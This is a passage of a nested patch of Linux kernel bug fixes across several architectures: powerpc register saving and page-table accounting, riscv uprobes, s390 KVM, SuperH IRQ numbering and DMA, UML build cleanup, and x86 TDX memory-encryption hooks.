+ 	unsigned long kuap;
+ 	bool stack_store = read_thread_flags() & _TIF_EMULATE_STACK_STORE;
+@@ -392,7 +391,7 @@ notrace unsigned long interrupt_exit_kernel_prepare(struct pt_regs *regs)
+ 
+ 	kuap = kuap_get_and_assert_locked();
+ 
+-	local_irq_save(flags);
++	local_irq_disable();
+ 
+ 	if (!arch_irq_disabled_regs(regs)) {
+ 		/* Returning to a kernel context with local irqs enabled. */
+diff --git a/arch/powerpc/kernel/ppc_save_regs.S b/arch/powerpc/kernel/ppc_save_regs.S
+index 2d4d21bb46a97..235ae24284519 100644
+--- a/arch/powerpc/kernel/ppc_save_regs.S
++++ b/arch/powerpc/kernel/ppc_save_regs.S
+@@ -21,60 +21,33 @@
+  * different ABIs, though).
+  */
+ _GLOBAL(ppc_save_regs)
+-	PPC_STL	r0,0*SZL(r3)
++	/* This allows stack frame accessor macros and offsets to be used */
++	subi	r3,r3,STACK_FRAME_OVERHEAD
++	PPC_STL	r0,GPR0(r3)
+ #ifdef CONFIG_PPC32
+-	stmw	r2, 2*SZL(r3)
++	stmw	r2,GPR2(r3)
+ #else
+-	PPC_STL	r2,2*SZL(r3)
+-	PPC_STL	r3,3*SZL(r3)
+-	PPC_STL	r4,4*SZL(r3)
+-	PPC_STL	r5,5*SZL(r3)
+-	PPC_STL	r6,6*SZL(r3)
+-	PPC_STL	r7,7*SZL(r3)
+-	PPC_STL	r8,8*SZL(r3)
+-	PPC_STL	r9,9*SZL(r3)
+-	PPC_STL	r10,10*SZL(r3)
+-	PPC_STL	r11,11*SZL(r3)
+-	PPC_STL	r12,12*SZL(r3)
+-	PPC_STL	r13,13*SZL(r3)
+-	PPC_STL	r14,14*SZL(r3)
+-	PPC_STL	r15,15*SZL(r3)
+-	PPC_STL	r16,16*SZL(r3)
+-	PPC_STL	r17,17*SZL(r3)
+-	PPC_STL	r18,18*SZL(r3)
+-	PPC_STL	r19,19*SZL(r3)
+-	PPC_STL	r20,20*SZL(r3)
+-	PPC_STL	r21,21*SZL(r3)
+-	PPC_STL	r22,22*SZL(r3)
+-	PPC_STL	r23,23*SZL(r3)
+-	PPC_STL	r24,24*SZL(r3)
+-	PPC_STL	r25,25*SZL(r3)
+-	PPC_STL	r26,26*SZL(r3)
+-	PPC_STL	r27,27*SZL(r3)
+-	PPC_STL	r28,28*SZL(r3)
+-	PPC_STL	r29,29*SZL(r3)
+-	PPC_STL	r30,30*SZL(r3)
+-	PPC_STL	r31,31*SZL(r3)
++	SAVE_GPRS(2, 31, r3)
+ 	lbz	r0,PACAIRQSOFTMASK(r13)
+-	PPC_STL	r0,SOFTE-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,SOFTE(r3)
+ #endif
+-	/* go up one stack frame for SP */
+-	PPC_LL	r4,0(r1)
+-	PPC_STL	r4,1*SZL(r3)
++	/* store current SP */
++	PPC_STL	r1,GPR1(r3)
+ 	/* get caller's LR */
++	PPC_LL	r4,0(r1)
+ 	PPC_LL	r0,LRSAVE(r4)
+-	PPC_STL	r0,_LINK-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_LINK(r3)
+ 	mflr	r0
+-	PPC_STL	r0,_NIP-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_NIP(r3)
+ 	mfmsr	r0
+-	PPC_STL	r0,_MSR-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_MSR(r3)
+ 	mfctr	r0
+-	PPC_STL	r0,_CTR-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_CTR(r3)
+ 	mfxer	r0
+-	PPC_STL	r0,_XER-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_XER(r3)
+ 	mfcr	r0
+-	PPC_STL	r0,_CCR-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_CCR(r3)
+ 	li	r0,0
+-	PPC_STL	r0,_TRAP-STACK_FRAME_OVERHEAD(r3)
+-	PPC_STL	r0,ORIG_GPR3-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_TRAP(r3)
++	PPC_STL	r0,ORIG_GPR3(r3)
+ 	blr
+diff --git a/arch/powerpc/kernel/signal_32.c b/arch/powerpc/kernel/signal_32.c
+index c114c7f25645c..7a718ed32b277 100644
+--- a/arch/powerpc/kernel/signal_32.c
++++ b/arch/powerpc/kernel/signal_32.c
+@@ -264,8 +264,9 @@ static void prepare_save_user_regs(int ctx_has_vsx_region)
+ #endif
+ }
+ 
+-static int __unsafe_save_user_regs(struct pt_regs *regs, struct mcontext __user *frame,
+-				   struct mcontext __user *tm_frame, int ctx_has_vsx_region)
++static __always_inline int
++__unsafe_save_user_regs(struct pt_regs *regs, struct mcontext __user *frame,
++			struct mcontext __user *tm_frame, int ctx_has_vsx_region)
+ {
+ 	unsigned long msr = regs->msr;
+ 
+@@ -364,8 +365,9 @@ static void prepare_save_tm_user_regs(void)
+ 		current->thread.ckvrsave = mfspr(SPRN_VRSAVE);
+ }
+ 
+-static int save_tm_user_regs_unsafe(struct pt_regs *regs, struct mcontext __user *frame,
+-				    struct mcontext __user *tm_frame, unsigned long msr)
++static __always_inline int
++save_tm_user_regs_unsafe(struct pt_regs *regs, struct mcontext __user *frame,
++			 struct mcontext __user *tm_frame, unsigned long msr)
+ {
+ 	/* Save both sets of general registers */
+ 	unsafe_save_general_regs(&current->thread.ckpt_regs, frame, failed);
+@@ -444,8 +446,9 @@ failed:
+ #else
+ static void prepare_save_tm_user_regs(void) { }
+ 
+-static int save_tm_user_regs_unsafe(struct pt_regs *regs, struct mcontext __user *frame,
+-				    struct mcontext __user *tm_frame, unsigned long msr)
++static __always_inline int
++save_tm_user_regs_unsafe(struct pt_regs *regs, struct mcontext __user *frame,
++			 struct mcontext __user *tm_frame, unsigned long msr)
+ {
+ 	return 0;
+ }
+diff --git a/arch/powerpc/mm/book3s64/radix_pgtable.c b/arch/powerpc/mm/book3s64/radix_pgtable.c
+index 2297aa764ecdb..e8db8c8efe359 100644
+--- a/arch/powerpc/mm/book3s64/radix_pgtable.c
++++ b/arch/powerpc/mm/book3s64/radix_pgtable.c
+@@ -745,9 +745,9 @@ static void free_pud_table(pud_t *pud_start, p4d_t *p4d)
+ }
+ 
+ static void remove_pte_table(pte_t *pte_start, unsigned long addr,
+-			     unsigned long end)
++			     unsigned long end, bool direct)
+ {
+-	unsigned long next;
++	unsigned long next, pages = 0;
+ 	pte_t *pte;
+ 
+ 	pte = pte_start + pte_index(addr);
+@@ -769,13 +769,16 @@ static void remove_pte_table(pte_t *pte_start, unsigned long addr,
+ 		}
+ 
+ 		pte_clear(&init_mm, addr, pte);
++		pages++;
+ 	}
++	if (direct)
++		update_page_count(mmu_virtual_psize, -pages);
+ }
+ 
+ static void __meminit remove_pmd_table(pmd_t *pmd_start, unsigned long addr,
+-			     unsigned long end)
++				       unsigned long end, bool direct)
+ {
+-	unsigned long next;
++	unsigned long next, pages = 0;
+ 	pte_t *pte_base;
+ 	pmd_t *pmd;
+ 
+@@ -793,19 +796,22 @@ static void __meminit remove_pmd_table(pmd_t *pmd_start, unsigned long addr,
+ 				continue;
+ 			}
+ 			pte_clear(&init_mm, addr, (pte_t *)pmd);
++			pages++;
+ 			continue;
+ 		}
+ 
+ 		pte_base = (pte_t *)pmd_page_vaddr(*pmd);
+-		remove_pte_table(pte_base, addr, next);
++		remove_pte_table(pte_base, addr, next, direct);
+ 		free_pte_table(pte_base, pmd);
+ 	}
++	if (direct)
++		update_page_count(MMU_PAGE_2M, -pages);
+ }
+ 
+ static void __meminit remove_pud_table(pud_t *pud_start, unsigned long addr,
+-			     unsigned long end)
++				       unsigned long end, bool direct)
+ {
+-	unsigned long next;
++	unsigned long next, pages = 0;
+ 	pmd_t *pmd_base;
+ 	pud_t *pud;
+ 
+@@ -823,16 +829,20 @@ static void __meminit remove_pud_table(pud_t *pud_start, unsigned long addr,
+ 				continue;
+ 			}
+ 			pte_clear(&init_mm, addr, (pte_t *)pud);
++			pages++;
+ 			continue;
+ 		}
+ 
+ 		pmd_base = pud_pgtable(*pud);
+-		remove_pmd_table(pmd_base, addr, next);
++		remove_pmd_table(pmd_base, addr, next, direct);
+ 		free_pmd_table(pmd_base, pud);
+ 	}
++	if (direct)
++		update_page_count(MMU_PAGE_1G, -pages);
+ }
+ 
+-static void __meminit remove_pagetable(unsigned long start, unsigned long end)
++static void __meminit remove_pagetable(unsigned long start, unsigned long end,
++				       bool direct)
+ {
+ 	unsigned long addr, next;
+ 	pud_t *pud_base;
+@@ -861,7 +871,7 @@ static void __meminit remove_pagetable(unsigned long start, unsigned long end)
+ 		}
+ 
+ 		pud_base = p4d_pgtable(*p4d);
+-		remove_pud_table(pud_base, addr, next);
++		remove_pud_table(pud_base, addr, next, direct);
+ 		free_pud_table(pud_base, p4d);
+ 	}
+ 
+@@ -884,7 +894,7 @@ int __meminit radix__create_section_mapping(unsigned long start,
+ 
+ int __meminit radix__remove_section_mapping(unsigned long start, unsigned long end)
+ {
+-	remove_pagetable(start, end);
++	remove_pagetable(start, end, true);
+ 	return 0;
+ }
+ #endif /* CONFIG_MEMORY_HOTPLUG */
+@@ -920,7 +930,7 @@ int __meminit radix__vmemmap_create_mapping(unsigned long start,
+ #ifdef CONFIG_MEMORY_HOTPLUG
+ void __meminit radix__vmemmap_remove_mapping(unsigned long start, unsigned long page_size)
+ {
+-	remove_pagetable(start, start + page_size);
++	remove_pagetable(start, start + page_size, false);
+ }
+ #endif
+ #endif
+diff --git a/arch/powerpc/mm/init_64.c b/arch/powerpc/mm/init_64.c
+index 05b0d584e50b8..fe1b83020e0df 100644
+--- a/arch/powerpc/mm/init_64.c
++++ b/arch/powerpc/mm/init_64.c
+@@ -189,7 +189,7 @@ static bool altmap_cross_boundary(struct vmem_altmap *altmap, unsigned long star
+ 	unsigned long nr_pfn = page_size / sizeof(struct page);
+ 	unsigned long start_pfn = page_to_pfn((struct page *)start);
+ 
+-	if ((start_pfn + nr_pfn) > altmap->end_pfn)
++	if ((start_pfn + nr_pfn - 1) > altmap->end_pfn)
+ 		return true;
+ 
+ 	if (start_pfn < altmap->base_pfn)
+diff --git a/arch/powerpc/platforms/powernv/pci-sriov.c b/arch/powerpc/platforms/powernv/pci-sriov.c
+index 7195133b26bb9..59882da3e7425 100644
+--- a/arch/powerpc/platforms/powernv/pci-sriov.c
++++ b/arch/powerpc/platforms/powernv/pci-sriov.c
+@@ -594,12 +594,12 @@ static void pnv_pci_sriov_disable(struct pci_dev *pdev)
+ 	struct pnv_iov_data   *iov;
+ 
+ 	iov = pnv_iov_get(pdev);
+-	num_vfs = iov->num_vfs;
+-	base_pe = iov->vf_pe_arr[0].pe_number;
+-
+ 	if (WARN_ON(!iov))
+ 		return;
+ 
++	num_vfs = iov->num_vfs;
++	base_pe = iov->vf_pe_arr[0].pe_number;
++
+ 	/* Release VF PEs */
+ 	pnv_ioda_release_vf_PE(pdev);
+ 
+diff --git a/arch/powerpc/platforms/powernv/vas-window.c b/arch/powerpc/platforms/powernv/vas-window.c
+index 0072682531d80..b664838008c12 100644
+--- a/arch/powerpc/platforms/powernv/vas-window.c
++++ b/arch/powerpc/platforms/powernv/vas-window.c
+@@ -1310,8 +1310,8 @@ int vas_win_close(struct vas_window *vwin)
+ 	/* if send window, drop reference to matching receive window */
+ 	if (window->tx_win) {
+ 		if (window->user_win) {
+-			put_vas_user_win_ref(&vwin->task_ref);
+ 			mm_context_remove_vas_window(vwin->task_ref.mm);
++			put_vas_user_win_ref(&vwin->task_ref);
+ 		}
+ 		put_rx_win(window->rxwin);
+ 	}
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 94c023bb13e05..880b962afc057 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -507,8 +507,8 @@ static int vas_deallocate_window(struct vas_window *vwin)
+ 	vascaps[win->win_type].nr_open_windows--;
+ 	mutex_unlock(&vas_pseries_mutex);
+ 
+-	put_vas_user_win_ref(&vwin->task_ref);
+ 	mm_context_remove_vas_window(vwin->task_ref.mm);
++	put_vas_user_win_ref(&vwin->task_ref);
+ 
+ 	kfree(win);
+ 	return 0;
+diff --git a/arch/riscv/kernel/probes/uprobes.c b/arch/riscv/kernel/probes/uprobes.c
+index c976a21cd4bd5..194f166b2cc40 100644
+--- a/arch/riscv/kernel/probes/uprobes.c
++++ b/arch/riscv/kernel/probes/uprobes.c
+@@ -67,6 +67,7 @@ int arch_uprobe_post_xol(struct arch_uprobe *auprobe, struct pt_regs *regs)
+ 	struct uprobe_task *utask = current->utask;
+ 
+ 	WARN_ON_ONCE(current->thread.bad_cause != UPROBE_TRAP_NR);
++	current->thread.bad_cause = utask->autask.saved_cause;
+ 
+ 	instruction_pointer_set(regs, utask->vaddr + auprobe->insn_size);
+ 
+@@ -102,6 +103,7 @@ void arch_uprobe_abort_xol(struct arch_uprobe *auprobe, struct pt_regs *regs)
+ {
+ 	struct uprobe_task *utask = current->utask;
+ 
++	current->thread.bad_cause = utask->autask.saved_cause;
+ 	/*
+ 	 * Task has received a fatal signal, so reset back to probbed
+ 	 * address.
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index d8d97df801909..9390cdff39ffc 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -255,7 +255,6 @@ static void __init setup_bootmem(void)
+ 	dma_contiguous_reserve(dma32_phys_limit);
+ 	if (IS_ENABLED(CONFIG_64BIT))
+ 		hugetlb_cma_reserve(PUD_SHIFT - PAGE_SHIFT);
+-	memblock_allow_resize();
+ }
+ 
+ #ifdef CONFIG_MMU
+@@ -1211,6 +1210,9 @@ void __init paging_init(void)
+ {
+ 	setup_bootmem();
+ 	setup_vm_final();
++
++	/* Depend on that Linear Mapping is ready */
++	memblock_allow_resize();
+ }
+ 
+ void __init misc_mem_init(void)
+diff --git a/arch/s390/kvm/diag.c b/arch/s390/kvm/diag.c
+index 807fa9da1e721..3c65b8258ae67 100644
+--- a/arch/s390/kvm/diag.c
++++ b/arch/s390/kvm/diag.c
+@@ -166,6 +166,7 @@ static int diag9c_forwarding_overrun(void)
+ static int __diag_time_slice_end_directed(struct kvm_vcpu *vcpu)
+ {
+ 	struct kvm_vcpu *tcpu;
++	int tcpu_cpu;
+ 	int tid;
+ 
+ 	tid = vcpu->run->s.regs.gprs[(vcpu->arch.sie_block->ipa & 0xf0) >> 4];
+@@ -181,14 +182,15 @@ static int __diag_time_slice_end_directed(struct kvm_vcpu *vcpu)
+ 		goto no_yield;
+ 
+ 	/* target guest VCPU already running */
+-	if (READ_ONCE(tcpu->cpu) >= 0) {
++	tcpu_cpu = READ_ONCE(tcpu->cpu);
++	if (tcpu_cpu >= 0) {
+ 		if (!diag9c_forwarding_hz || diag9c_forwarding_overrun())
+ 			goto no_yield;
+ 
+ 		/* target host CPU already running */
+-		if (!vcpu_is_preempted(tcpu->cpu))
++		if (!vcpu_is_preempted(tcpu_cpu))
+ 			goto no_yield;
+-		smp_yield_cpu(tcpu->cpu);
++		smp_yield_cpu(tcpu_cpu);
+ 		VCPU_EVENT(vcpu, 5,
+ 			   "diag time slice end directed to %d: yield forwarded",
+ 			   tid);
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index 26f89ec3062ba..3775363471f0c 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -2147,6 +2147,10 @@ static unsigned long kvm_s390_next_dirty_cmma(struct kvm_memslots *slots,
+ 		ms = container_of(mnode, struct kvm_memory_slot, gfn_node[slots->node_idx]);
+ 		ofs = 0;
+ 	}
++
++	if (cur_gfn < ms->base_gfn)
++		ofs = 0;
++
+ 	ofs = find_next_bit(kvm_second_dirty_bitmap(ms), ms->npages, ofs);
+ 	while (ofs >= ms->npages && (mnode = rb_next(mnode))) {
+ 		ms = container_of(mnode, struct kvm_memory_slot, gfn_node[slots->node_idx]);
+diff --git a/arch/s390/kvm/vsie.c b/arch/s390/kvm/vsie.c
+index ace2541ababd3..740f8b56e63f9 100644
+--- a/arch/s390/kvm/vsie.c
++++ b/arch/s390/kvm/vsie.c
+@@ -169,7 +169,8 @@ static int setup_apcb00(struct kvm_vcpu *vcpu, unsigned long *apcb_s,
+ 			    sizeof(struct kvm_s390_apcb0)))
+ 		return -EFAULT;
+ 
+-	bitmap_and(apcb_s, apcb_s, apcb_h, sizeof(struct kvm_s390_apcb0));
++	bitmap_and(apcb_s, apcb_s, apcb_h,
++		   BITS_PER_BYTE * sizeof(struct kvm_s390_apcb0));
+ 
+ 	return 0;
+ }
+@@ -191,7 +192,8 @@ static int setup_apcb11(struct kvm_vcpu *vcpu, unsigned long *apcb_s,
+ 			    sizeof(struct kvm_s390_apcb1)))
+ 		return -EFAULT;
+ 
+-	bitmap_and(apcb_s, apcb_s, apcb_h, sizeof(struct kvm_s390_apcb1));
++	bitmap_and(apcb_s, apcb_s, apcb_h,
++		   BITS_PER_BYTE * sizeof(struct kvm_s390_apcb1));
+ 
+ 	return 0;
+ }
+diff --git a/arch/sh/boards/mach-dreamcast/irq.c b/arch/sh/boards/mach-dreamcast/irq.c
+index cc06e4cdb4cdf..0eec82fb85e7c 100644
+--- a/arch/sh/boards/mach-dreamcast/irq.c
++++ b/arch/sh/boards/mach-dreamcast/irq.c
+@@ -108,13 +108,13 @@ int systemasic_irq_demux(int irq)
+ 	__u32 j, bit;
+ 
+ 	switch (irq) {
+-	case 13:
++	case 13 + 16:
+ 		level = 0;
+ 		break;
+-	case 11:
++	case 11 + 16:
+ 		level = 1;
+ 		break;
+-	case  9:
++	case 9 + 16:
+ 		level = 2;
+ 		break;
+ 	default:
+diff --git a/arch/sh/boards/mach-highlander/setup.c b/arch/sh/boards/mach-highlander/setup.c
+index 533393d779c2b..01565660a6695 100644
+--- a/arch/sh/boards/mach-highlander/setup.c
++++ b/arch/sh/boards/mach-highlander/setup.c
+@@ -389,10 +389,10 @@ static unsigned char irl2irq[HL_NR_IRL];
+ 
+ static int highlander_irq_demux(int irq)
+ {
+-	if (irq >= HL_NR_IRL || irq < 0 || !irl2irq[irq])
++	if (irq >= HL_NR_IRL + 16 || irq < 16 || !irl2irq[irq - 16])
+ 		return irq;
+ 
+-	return irl2irq[irq];
++	return irl2irq[irq - 16];
+ }
+ 
+ static void __init highlander_init_irq(void)
+diff --git a/arch/sh/boards/mach-r2d/irq.c b/arch/sh/boards/mach-r2d/irq.c
+index e34f81e9ae813..d0a54a9adbce2 100644
+--- a/arch/sh/boards/mach-r2d/irq.c
++++ b/arch/sh/boards/mach-r2d/irq.c
+@@ -117,10 +117,10 @@ static unsigned char irl2irq[R2D_NR_IRL];
+ 
+ int rts7751r2d_irq_demux(int irq)
+ {
+-	if (irq >= R2D_NR_IRL || irq < 0 || !irl2irq[irq])
++	if (irq >= R2D_NR_IRL + 16 || irq < 16 || !irl2irq[irq - 16])
+ 		return irq;
+ 
+-	return irl2irq[irq];
++	return irl2irq[irq - 16];
+ }
+ 
+ /*
+diff --git a/arch/sh/cchips/Kconfig b/arch/sh/cchips/Kconfig
+index efde2edb56278..9659a0bc58dec 100644
+--- a/arch/sh/cchips/Kconfig
++++ b/arch/sh/cchips/Kconfig
+@@ -29,9 +29,9 @@ endchoice
+ config HD64461_IRQ
+ 	int "HD64461 IRQ"
+ 	depends on HD64461
+-	default "36"
++	default "52"
+ 	help
+-	  The default setting of the HD64461 IRQ is 36.
++	  The default setting of the HD64461 IRQ is 52.
+ 
+ 	  Do not change this unless you know what you are doing.
+ 
+diff --git a/arch/sh/drivers/dma/dma-sh.c b/arch/sh/drivers/dma/dma-sh.c
+index 96c626c2cd0a4..306fba1564e5e 100644
+--- a/arch/sh/drivers/dma/dma-sh.c
++++ b/arch/sh/drivers/dma/dma-sh.c
+@@ -18,6 +18,18 @@
+ #include <cpu/dma-register.h>
+ #include <cpu/dma.h>
+ 
++/*
++ * Some of the SoCs feature two DMAC modules. In such a case, the channels are
++ * distributed equally among them.
++ */
++#ifdef	SH_DMAC_BASE1
++#define	SH_DMAC_NR_MD_CH	(CONFIG_NR_ONCHIP_DMA_CHANNELS / 2)
++#else
++#define	SH_DMAC_NR_MD_CH	CONFIG_NR_ONCHIP_DMA_CHANNELS
++#endif
++
++#define	SH_DMAC_CH_SZ		0x10
++
+ /*
+  * Define the default configuration for dual address memory-memory transfer.
+  * The 0x400 value represents auto-request, external->external.
+@@ -29,7 +41,7 @@ static unsigned long dma_find_base(unsigned int chan)
+ 	unsigned long base = SH_DMAC_BASE0;
+ 
+ #ifdef SH_DMAC_BASE1
+-	if (chan >= 6)
++	if (chan >= SH_DMAC_NR_MD_CH)
+ 		base = SH_DMAC_BASE1;
+ #endif
+ 
+@@ -40,13 +52,13 @@ static unsigned long dma_base_addr(unsigned int chan)
+ {
+ 	unsigned long base = dma_find_base(chan);
+ 
+-	/* Normalize offset calculation */
+-	if (chan >= 9)
+-		chan -= 6;
+-	if (chan >= 4)
+-		base += 0x10;
++	chan = (chan % SH_DMAC_NR_MD_CH) * SH_DMAC_CH_SZ;
++
++	/* DMAOR is placed inside the channel register space. Step over it. */
++	if (chan >= DMAOR)
++		base += SH_DMAC_CH_SZ;
+ 
+-	return base + (chan * 0x10);
++	return base + chan;
+ }
+ 
+ #ifdef CONFIG_SH_DMA_IRQ_MULTI
+@@ -250,12 +262,11 @@ static int sh_dmac_get_dma_residue(struct dma_channel *chan)
+ #define NR_DMAOR	1
+ #endif
+ 
+-/*
+- * DMAOR bases are broken out amongst channel groups. DMAOR0 manages
+- * channels 0 - 5, DMAOR1 6 - 11 (optional).
+- */
+-#define dmaor_read_reg(n)		__raw_readw(dma_find_base((n)*6))
+-#define dmaor_write_reg(n, data)	__raw_writew(data, dma_find_base(n)*6)
++#define dmaor_read_reg(n)		__raw_readw(dma_find_base((n) * \
++						    SH_DMAC_NR_MD_CH) + DMAOR)
++#define dmaor_write_reg(n, data)	__raw_writew(data, \
++						     dma_find_base((n) * \
++						     SH_DMAC_NR_MD_CH) + DMAOR)
+ 
+ static inline int dmaor_reset(int no)
+ {
+diff --git a/arch/sh/include/asm/hd64461.h b/arch/sh/include/asm/hd64461.h
+index afb24cb034b11..d2c485fa333b5 100644
+--- a/arch/sh/include/asm/hd64461.h
++++ b/arch/sh/include/asm/hd64461.h
+@@ -229,7 +229,7 @@
+ #define	HD64461_NIMR		HD64461_IO_OFFSET(0x5002)
+ 
+ #define	HD64461_IRQBASE		OFFCHIP_IRQ_BASE
+-#define	OFFCHIP_IRQ_BASE	64
++#define	OFFCHIP_IRQ_BASE	(64 + 16)
+ #define	HD64461_IRQ_NUM		16
+ 
+ #define	HD64461_IRQ_UART	(HD64461_IRQBASE+5)
+diff --git a/arch/sh/include/mach-common/mach/highlander.h b/arch/sh/include/mach-common/mach/highlander.h
+index fb44c299d0337..b12c795584225 100644
+--- a/arch/sh/include/mach-common/mach/highlander.h
++++ b/arch/sh/include/mach-common/mach/highlander.h
+@@ -176,7 +176,7 @@
+ #define IVDR_CK_ON	4		/* iVDR Clock ON */
+ #endif
+ 
+-#define HL_FPGA_IRQ_BASE	200
++#define HL_FPGA_IRQ_BASE	(200 + 16)
+ #define HL_NR_IRL		15
+ 
+ #define IRQ_AX88796		(HL_FPGA_IRQ_BASE + 0)
+diff --git a/arch/sh/include/mach-common/mach/r2d.h b/arch/sh/include/mach-common/mach/r2d.h
+index 0d7e483c7d3f5..69bc1907c5637 100644
+--- a/arch/sh/include/mach-common/mach/r2d.h
++++ b/arch/sh/include/mach-common/mach/r2d.h
+@@ -47,7 +47,7 @@
+ 
+ #define IRLCNTR1	(PA_BCR + 0)	/* Interrupt Control Register1 */
+ 
+-#define R2D_FPGA_IRQ_BASE	100
++#define R2D_FPGA_IRQ_BASE	(100 + 16)
+ 
+ #define IRQ_VOYAGER		(R2D_FPGA_IRQ_BASE + 0)
+ #define IRQ_EXT			(R2D_FPGA_IRQ_BASE + 1)
+diff --git a/arch/sh/include/mach-dreamcast/mach/sysasic.h b/arch/sh/include/mach-dreamcast/mach/sysasic.h
+index ed69ce7f20301..3b27be9a527ea 100644
+--- a/arch/sh/include/mach-dreamcast/mach/sysasic.h
++++ b/arch/sh/include/mach-dreamcast/mach/sysasic.h
+@@ -22,7 +22,7 @@
+    takes.
+ */
+ 
+-#define HW_EVENT_IRQ_BASE  48
++#define HW_EVENT_IRQ_BASE  (48 + 16)
+ 
+ /* IRQ 13 */
+ #define HW_EVENT_VSYNC     (HW_EVENT_IRQ_BASE +  5) /* VSync */
+diff --git a/arch/sh/include/mach-se/mach/se7724.h b/arch/sh/include/mach-se/mach/se7724.h
+index 1fe28820dfa95..ea6c46633b337 100644
+--- a/arch/sh/include/mach-se/mach/se7724.h
++++ b/arch/sh/include/mach-se/mach/se7724.h
+@@ -37,7 +37,7 @@
+ #define IRQ2_IRQ        evt2irq(0x640)
+ 
+ /* Bits in IRQ012 registers */
+-#define SE7724_FPGA_IRQ_BASE	220
++#define SE7724_FPGA_IRQ_BASE	(220 + 16)
+ 
+ /* IRQ0 */
+ #define IRQ0_BASE	SE7724_FPGA_IRQ_BASE
+diff --git a/arch/sh/kernel/cpu/sh2/probe.c b/arch/sh/kernel/cpu/sh2/probe.c
+index d342ea08843f6..70a07f4f2142f 100644
+--- a/arch/sh/kernel/cpu/sh2/probe.c
++++ b/arch/sh/kernel/cpu/sh2/probe.c
+@@ -21,7 +21,7 @@ static int __init scan_cache(unsigned long node, const char *uname,
+ 	if (!of_flat_dt_is_compatible(node, "jcore,cache"))
+ 		return 0;
+ 
+-	j2_ccr_base = (u32 __iomem *)of_flat_dt_translate_address(node);
++	j2_ccr_base = ioremap(of_flat_dt_translate_address(node), 4);
+ 
+ 	return 1;
+ }
+diff --git a/arch/sh/kernel/cpu/sh3/entry.S b/arch/sh/kernel/cpu/sh3/entry.S
+index e48b3dd996f58..b1f5b3c58a018 100644
+--- a/arch/sh/kernel/cpu/sh3/entry.S
++++ b/arch/sh/kernel/cpu/sh3/entry.S
+@@ -470,9 +470,9 @@ ENTRY(handle_interrupt)
+ 	mov	r4, r0		! save vector->jmp table offset for later
+ 
+ 	shlr2	r4		! vector to IRQ# conversion
+-	add	#-0x10, r4
+ 
+-	cmp/pz	r4		! is it a valid IRQ?
++	mov	#0x10, r5
++	cmp/hs	r5, r4		! is it a valid IRQ?
+ 	bt	10f
+ 
+ 	/*
+diff --git a/arch/um/Makefile b/arch/um/Makefile
+index f1d4d67157be0..3dbd0e3b660ea 100644
+--- a/arch/um/Makefile
++++ b/arch/um/Makefile
+@@ -148,7 +148,7 @@ export LDFLAGS_vmlinux := $(LDFLAGS_EXECSTACK)
+ # When cleaning we don't include .config, so we don't include
+ # TT or skas makefiles and don't clean skas_ptregs.h.
+ CLEAN_FILES += linux x.i gmon.out
+-MRPROPER_FILES += arch/$(SUBARCH)/include/generated
++MRPROPER_FILES += $(HOST_DIR)/include/generated
+ 
+ archclean:
+ 	@find . \( -name '*.bb' -o -name '*.bbg' -o -name '*.da' \
+diff --git a/arch/x86/coco/tdx/tdx.c b/arch/x86/coco/tdx/tdx.c
+index b8998cf0508a6..8a1d48b8c2a3e 100644
+--- a/arch/x86/coco/tdx/tdx.c
++++ b/arch/x86/coco/tdx/tdx.c
+@@ -756,6 +756,30 @@ static bool tdx_enc_status_changed(unsigned long vaddr, int numpages, bool enc)
+ 	return true;
+ }
+ 
++static bool tdx_enc_status_change_prepare(unsigned long vaddr, int numpages,
++					  bool enc)
++{
++	/*
++	 * Only handle shared->private conversion here.
++	 * See the comment in tdx_early_init().
++	 */
++	if (enc)
++		return tdx_enc_status_changed(vaddr, numpages, enc);
++	return true;
++}
++
++static bool tdx_enc_status_change_finish(unsigned long vaddr, int numpages,
++					 bool enc)
++{
++	/*
++	 * Only handle private->shared conversion here.
++	 * See the comment in tdx_early_init().
++	 */
++	if (!enc)
++		return tdx_enc_status_changed(vaddr, numpages, enc);
++	return true;
++}
++
+ void __init tdx_early_init(void)
+ {
+ 	u64 cc_mask;
+@@ -780,9 +804,30 @@ void __init tdx_early_init(void)
+ 	 */
+ 	physical_mask &= cc_mask - 1;
+ 
+-	x86_platform.guest.enc_cache_flush_required = tdx_cache_flush_required;
+-	x86_platform.guest.enc_tlb_flush_required   = tdx_tlb_flush_required;
+-	x86_platform.guest.enc_status_change_finish = tdx_enc_status_changed;
++	/*
++	 * The kernel mapping should match the TDX metadata for the page.
++	 * load_unaligned_zeropad() can touch memory *adjacent* to that which is
++	 * owned by the caller and can catch even _momentary_ mismatches.  Bad
++	 * things happen on mismatch:
++	 *
++	 *   - Private mapping => Shared Page  == Guest shutdown
++         *   - Shared mapping  => Private Page == Recoverable #VE
++	 *
++	 * guest.enc_status_change_prepare() converts the page from
++	 * shared=>private before the mapping becomes private.
++	 *
++	 * guest.enc_status_change_finish() converts the page from
++	 * private=>shared after the mapping becomes private.
++	 *
++	 * In both cases there is a temporary shared mapping to a private page,
++	 * which can result in a #VE.  But, there is never a private mapping to
++	 * a shared page.
++	 */
++	x86_platform.guest.enc_status_change_prepare = tdx_enc_status_change_prepare;
++	x86_platform.guest.enc_status_change_finish  = tdx_enc_status_change_finish;
++
++	x86_platform.guest.enc_cache_flush_required  = tdx_cache_flush_required;
++	x86_platform.guest.enc_tlb_flush_required    = tdx_tlb_flush_required;
+ 
+ 	pr_info("Guest detected\n");
+ }
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 8ca5e827f30b2..6672a3f05fc68 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
